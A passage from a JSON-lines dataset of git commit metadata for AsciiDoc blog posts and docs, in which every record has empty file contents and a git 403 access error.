2012-11-09-google-cloud-endpoints.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2012-11-09-google-cloud-endpoints.adoc","new_file":"_posts\/2012-11-09-google-cloud-endpoints.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a7edc228f3ff7a9aa681a0ab01b0fa74948a159a","subject":"Update 2016-12-09-Azure-Machine-Learning.adoc","message":"Update 2016-12-09-Azure-Machine-Learning.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-09-Azure-Machine-Learning.adoc","new_file":"_posts\/2016-12-09-Azure-Machine-Learning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"685dcb7817968489acf32106ee75738486097869","subject":"Update 2011-01-12-Parser-des-parties-dechecs-avec-Scala-Parser-Combinators.adoc","message":"Update 2011-01-12-Parser-des-parties-dechecs-avec-Scala-Parser-Combinators.adoc","repos":"jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io","old_file":"_posts\/2011-01-12-Parser-des-parties-dechecs-avec-Scala-Parser-Combinators.adoc","new_file":"_posts\/2011-01-12-Parser-des-parties-dechecs-avec-Scala-Parser-Combinators.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jcsirot\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4a7be58b86835717d55f7f0d443b96e185ff7a0b","subject":"docs update","message":"docs update\n","repos":"SergeyPirogov\/kirk,SergeyPirogov\/kirk,SergeyPirogov\/kirk","old_file":"docs\/source\/index.adoc","new_file":"docs\/source\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SergeyPirogov\/kirk.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"87bdf0d5f7cb142804c9671004f908f1408eb47a","subject":"docs update","message":"docs update\n","repos":"SergeyPirogov\/kirk,SergeyPirogov\/kirk,SergeyPirogov\/kirk","old_file":"docs\/source\/index.adoc","new_file":"docs\/source\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SergeyPirogov\/kirk.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a43d9d537f121a30db1c430c9a0e26cea4fcb409","subject":"Deleted 2016-12-1-re-Invent2016.adoc","message":"Deleted 2016-12-1-re-Invent2016.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"2016-12-1-re-Invent2016.adoc","new_file":"2016-12-1-re-Invent2016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6c9435be3397c27de6a46a1198aa996a9cd28aa2","subject":"Work on website data: community #1005","message":"Work on website data: community #1005\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/topic\/community.adoc","new_file":"docs\/src\/main\/asciidoc\/topic\/community.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quarkusio\/quarkus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e44c5bf008df19e5663f300f22954a0fd7c3c658","subject":"Update 1901-01-02-About-Me.adoc","message":"Update 1901-01-02-About-Me.adoc","repos":"gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io","old_file":"_posts\/1901-01-02-About-Me.adoc","new_file":"_posts\/1901-01-02-About-Me.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gjagush\/gjagush.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ce9f080032270a256f5b145c5ed5e971a71418af","subject":"Update 2015-02-17-HubPress-Das-eigene-kostenfreie-Blog-uber-GitHub.adoc","message":"Update 2015-02-17-HubPress-Das-eigene-kostenfreie-Blog-uber-GitHub.adoc","repos":"Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de","old_file":"_posts\/2015-02-17-HubPress-Das-eigene-kostenfreie-Blog-uber-GitHub.adoc","new_file":"_posts\/2015-02-17-HubPress-Das-eigene-kostenfreie-Blog-uber-GitHub.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Bloggerschmidt\/bloggerschmidt.de.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6b049a04437989355e751ff9088237e7a11c30f3","subject":"Update 2016-04-06-Eficiencia-de-algoritmos-parte-I-en-el-principio.adoc","message":"Update 2016-04-06-Eficiencia-de-algoritmos-parte-I-en-el-principio.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-06-Eficiencia-de-algoritmos-parte-I-en-el-principio.adoc","new_file":"_posts\/2016-04-06-Eficiencia-de-algoritmos-parte-I-en-el-principio.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7c971891999a270443cbe4d3c8e9336bf40b46c7","subject":"Update 2016-05-05-Nautilus-File-Manager-scripts-Scale-J-P-G-images.adoc","message":"Update 2016-05-05-Nautilus-File-Manager-scripts-Scale-J-P-G-images.adoc","repos":"sgalles\/sgalles.github.io,sgalles\/sgalles.github.io,sgalles\/sgalles.github.io,sgalles\/sgalles.github.io","old_file":"_posts\/2016-05-05-Nautilus-File-Manager-scripts-Scale-J-P-G-images.adoc","new_file":"_posts\/2016-05-05-Nautilus-File-Manager-scripts-Scale-J-P-G-images.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sgalles\/sgalles.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7e6a95f20393200f0ce834720ee2e024226fb99a","subject":"y2b create post This Amazing Speaker Blends Into Its Surroundings","message":"y2b create post This Amazing Speaker Blends Into Its Surroundings","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-07-04-This-Amazing-Speaker-Blends-Into-Its-Surroundings.adoc","new_file":"_posts\/2016-07-04-This-Amazing-Speaker-Blends-Into-Its-Surroundings.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"626e1ccba60642c2075ba6395b52f7d5bee0df0a","subject":"Update 2018-08-25-Laravel56-Response.adoc","message":"Update 2018-08-25-Laravel56-Response.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5ccd2b48fd09296ae36b60e5b43775ec652ab5c1","subject":"Update 2017-02-25.adoc","message":"Update 2017-02-25.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2017-02-25.adoc","new_file":"_posts\/2017-02-25.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"14ee96c434d2e4d7edafda0d4bef98a747f06eda","subject":"Update 2014-04-18-Engaged-Invention.adoc","message":"Update 2014-04-18-Engaged-Invention.adoc","repos":"fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io","old_file":"_posts\/2014-04-18-Engaged-Invention.adoc","new_file":"_posts\/2014-04-18-Engaged-Invention.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fqure\/fqure.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9bbc82902fa8323b60f2843911e910c7c01e7a7d","subject":"Update 2017-09-24-Backdoor-CTF-2017.adoc","message":"Update 2017-09-24-Backdoor-CTF-2017.adoc","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2017-09-24-Backdoor-CTF-2017.adoc","new_file":"_posts\/2017-09-24-Backdoor-CTF-2017.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e82673cfb45ed8d28fa9414f7f3e4a87a0e36a68","subject":"v1.78-2","message":"v1.78-2\n","repos":"dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core","old_file":"release_notes.asciidoc","new_file":"release_notes.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"009f70cec927e3d4b0761bb9cf8690928d9781fe","subject":"Update 2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed.adoc","message":"Update 2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed.adoc","repos":"neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io","old_file":"_posts\/2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed.adoc","new_file":"_posts\/2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/neocarvajal\/neocarvajal.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5990f3c1699d77f00e056baeb90b3e9730d75499","subject":"Update 2015-10-25-Back-to-Basic.adoc","message":"Update 2015-10-25-Back-to-Basic.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-10-25-Back-to-Basic.adoc","new_file":"_posts\/2015-10-25-Back-to-Basic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e4ec9ece34ac69e59d18e357fad77e1302ec425d","subject":"Update 2016-11-17-NSUCRYPTO-2016.adoc","message":"Update 2016-11-17-NSUCRYPTO-2016.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-11-17-NSUCRYPTO-2016.adoc","new_file":"_posts\/2016-11-17-NSUCRYPTO-2016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eb3e92416b1556cffc70d2d95761e0506b2e1eea","subject":"Update 2016-03-28-Deploying-open-A-M-12-on-mesos.adoc","message":"Update 2016-03-28-Deploying-open-A-M-12-on-mesos.adoc","repos":"InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io","old_file":"_posts\/2016-03-28-Deploying-open-A-M-12-on-mesos.adoc","new_file":"_posts\/2016-03-28-Deploying-open-A-M-12-on-mesos.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InformatiQ\/informatiq.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"047b65b8a3d748f884d5589d224fadd80f402881","subject":"Update 2015-10-02-When-Epiales-Calls.adoc","message":"Update 2015-10-02-When-Epiales-Calls.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2015-10-02-When-Epiales-Calls.adoc","new_file":"_posts\/2015-10-02-When-Epiales-Calls.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4accc55895b16f0f2318e1b6b3daf4a16561ff0e","subject":"Update 2017-07-02-Continuous-learnig.adoc","message":"Update 2017-07-02-Continuous-learnig.adoc\n","repos":"InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io","old_file":"_posts\/2017-07-02-Continuous-learnig.adoc","new_file":"_posts\/2017-07-02-Continuous-learnig.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InformatiQ\/informatiq.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"724a99ba19f6272d5f4320591b1b63a45f5655dc","subject":"Update 2018-08-25-Laravel56-Response.adoc","message":"Update 2018-08-25-Laravel56-Response.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1a483298dd77209a6274838719deda8a7d869a50","subject":"Update 2016-08-29-HITB-Singapore-A-few-cryptography-challenge-writeups.adoc","message":"Update 2016-08-29-HITB-Singapore-A-few-cryptography-challenge-writeups.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-08-29-HITB-Singapore-A-few-cryptography-challenge-writeups.adoc","new_file":"_posts\/2016-08-29-HITB-Singapore-A-few-cryptography-challenge-writeups.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"75eaebe3adad5a7f0c7af026f772bc07ce312b76","subject":"Publish 2017-02-21.adoc","message":"Publish 2017-02-21.adoc","repos":"luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io","old_file":"2017-02-21.adoc","new_file":"2017-02-21.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/luckypoem\/blog.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d8be6048c224cdab749e34a2152a02562b8fa9a5","subject":"y2b create post CES 2013 VEGAS MEETUP!","message":"y2b create post CES 2013 VEGAS MEETUP!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-01-10-CES-2013-VEGAS-MEETUP.adoc","new_file":"_posts\/2013-01-10-CES-2013-VEGAS-MEETUP.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6d20068104520c2f5444f05660c9202e8182bdcd","subject":"Update 2015-05-30-My-Asyncjs-Cheatsheet.adoc","message":"Update 2015-05-30-My-Asyncjs-Cheatsheet.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-05-30-My-Asyncjs-Cheatsheet.adoc","new_file":"_posts\/2015-05-30-My-Asyncjs-Cheatsheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"147fdbf46234578037530f3745fb12effd81e3fc","subject":"Update 2015-09-15-HP-This-Isnt-a-Banner.adoc","message":"Update 2015-09-15-HP-This-Isnt-a-Banner.adoc","repos":"MirumSG\/agencyshowcase,MirumSG\/agencyshowcase,MirumSG\/agencyshowcase","old_file":"_posts\/2015-09-15-HP-This-Isnt-a-Banner.adoc","new_file":"_posts\/2015-09-15-HP-This-Isnt-a-Banner.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MirumSG\/agencyshowcase.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7b3466f2fdaf617c7cdddf79ffa9566faf5823ff","subject":"y2b create post 3 Cool Tech Deals - #13","message":"y2b create post 3 Cool Tech Deals - #13","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-01-26-3-Cool-Tech-Deals--13.adoc","new_file":"_posts\/2016-01-26-3-Cool-Tech-Deals--13.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2f95e41deff4b3fef960d5fa91fb227d46dd400c","subject":"Update 2017-09-30-Matrix-Layer-Rotation.adoc","message":"Update 2017-09-30-Matrix-Layer-Rotation.adoc","repos":"JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io","old_file":"_posts\/2017-09-30-Matrix-Layer-Rotation.adoc","new_file":"_posts\/2017-09-30-Matrix-Layer-Rotation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/JithinPavithran\/JithinPavithran.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c4018dc22f42112a8fdc200569088f1e6f928308","subject":"Update 2017-10-08-Installing-NPM-on-Mac.adoc","message":"Update 2017-10-08-Installing-NPM-on-Mac.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2017-10-08-Installing-NPM-on-Mac.adoc","new_file":"_posts\/2017-10-08-Installing-NPM-on-Mac.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ed9c74d85c21d6a451ecdff96d70f7c16debb47a","subject":"Added hangouts blog post","message":"Added hangouts blog post\n","repos":"forge\/docs,forge\/docs","old_file":"news\/2015-12-15-forge-3-hangouts.asciidoc","new_file":"news\/2015-12-15-forge-3-hangouts.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/forge\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"90f9c14a3b6d5942cf0397ba5a4da0e2bba6b498","subject":"Update 2017-09-17-4.adoc","message":"Update 2017-09-17-4.adoc","repos":"Lh4cKg\/Lh4cKg.github.io,Lh4cKg\/Lh4cKg.github.io,Lh4cKg\/Lh4cKg.github.io","old_file":"_posts\/2017-09-17-4.adoc","new_file":"_posts\/2017-09-17-4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Lh4cKg\/Lh4cKg.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"06222e3c2a8d8bef7122a4fdae88424ba87330c4","subject":"y2b create post Kindle Fire Road Trip","message":"y2b create post Kindle Fire Road Trip","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-11-15-Kindle-Fire-Road-Trip.adoc","new_file":"_posts\/2011-11-15-Kindle-Fire-Road-Trip.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d2ff5ea589c8d2acada3bb5eb5813ba088892380","subject":"Update 2017-07-09-Renewing-CERTBOT-certificates-painlessly.adoc","message":"Update 2017-07-09-Renewing-CERTBOT-certificates-painlessly.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2017-07-09-Renewing-CERTBOT-certificates-painlessly.adoc","new_file":"_posts\/2017-07-09-Renewing-CERTBOT-certificates-painlessly.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f90436933241ec43290524b6bdbe6c6e2a0be2fa","subject":"Update 2017-07-09-Renewing-CERTBOT-certificates-painlessly.adoc","message":"Update 2017-07-09-Renewing-CERTBOT-certificates-painlessly.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2017-07-09-Renewing-CERTBOT-certificates-painlessly.adoc","new_file":"_posts\/2017-07-09-Renewing-CERTBOT-certificates-painlessly.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d1efaa3e99e55ca8959b8faeb72b4b68cb7e0833","subject":"Update 2016-07-13-Git-command.adoc","message":"Update 2016-07-13-Git-command.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-07-13-Git-command.adoc","new_file":"_posts\/2016-07-13-Git-command.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b81097b852a67eba38b01243d527c99a2c72b4d3","subject":"Update 2017-04-08-Time-To-Fly.adoc","message":"Update 2017-04-08-Time-To-Fly.adoc","repos":"mcornell\/OFM,mcornell\/OFM,mcornell\/OFM,mcornell\/OFM","old_file":"_posts\/2017-04-08-Time-To-Fly.adoc","new_file":"_posts\/2017-04-08-Time-To-Fly.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mcornell\/OFM.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1d287a5965c244692ad200a84507688b94a85682","subject":"Update 2016-10-27.adoc","message":"Update 2016-10-27.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-10-27.adoc","new_file":"_posts\/2016-10-27.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9a592d33c0b158a5f4367c013a4a20b2f265602b","subject":"Start german documentation using asciidoc.","message":"Start german documentation using asciidoc.\n","repos":"Midnight-Myth\/Mitternacht-NEW,Midnight-Myth\/Mitternacht-NEW,Midnight-Myth\/Mitternacht-NEW,Midnight-Myth\/Mitternacht-NEW","old_file":"docs\/mitternacht.de.adoc","new_file":"docs\/mitternacht.de.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Midnight-Myth\/Mitternacht-NEW.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4c37b07ef4cdb57d992287569976bfaa6ea9cb49","subject":"Update 2016-10-06-How-I-Cracked-My-First-Interview-The-Ten-Principles-I-Followed.adoc","message":"Update 2016-10-06-How-I-Cracked-My-First-Interview-The-Ten-Principles-I-Followed.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2016-10-06-How-I-Cracked-My-First-Interview-The-Ten-Principles-I-Followed.adoc","new_file":"_posts\/2016-10-06-How-I-Cracked-My-First-Interview-The-Ten-Principles-I-Followed.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"17677fbfc9c13da0eb2b7df6ecfcd614cf7392e4","subject":"Update 2018-03-10-Azure-10.adoc","message":"Update 2018-03-10-Azure-10.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-10-Azure-10.adoc","new_file":"_posts\/2018-03-10-Azure-10.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"266e7b8e1f2b144b40b4880114762ae0c340182b","subject":"Update 2018-05-02-Azure-11.adoc","message":"Update 2018-05-02-Azure-11.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-02-Azure-11.adoc","new_file":"_posts\/2018-05-02-Azure-11.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"378871c2cdb083e3e799996765961b42892137b1","subject":"Create README.asciidoc","message":"Create README.asciidoc","repos":"ggVGc\/TerseJS,ggVGc\/TerseJS","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ggVGc\/TerseJS.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4c2b8d576f59403439c91ecfbcdd5db12033dea3","subject":"Revert \"Try delete README.asciidoc to force GitHub re-generate the initial page\"","message":"Revert \"Try delete README.asciidoc to force GitHub re-generate the initial page\"\n\nThis reverts commit 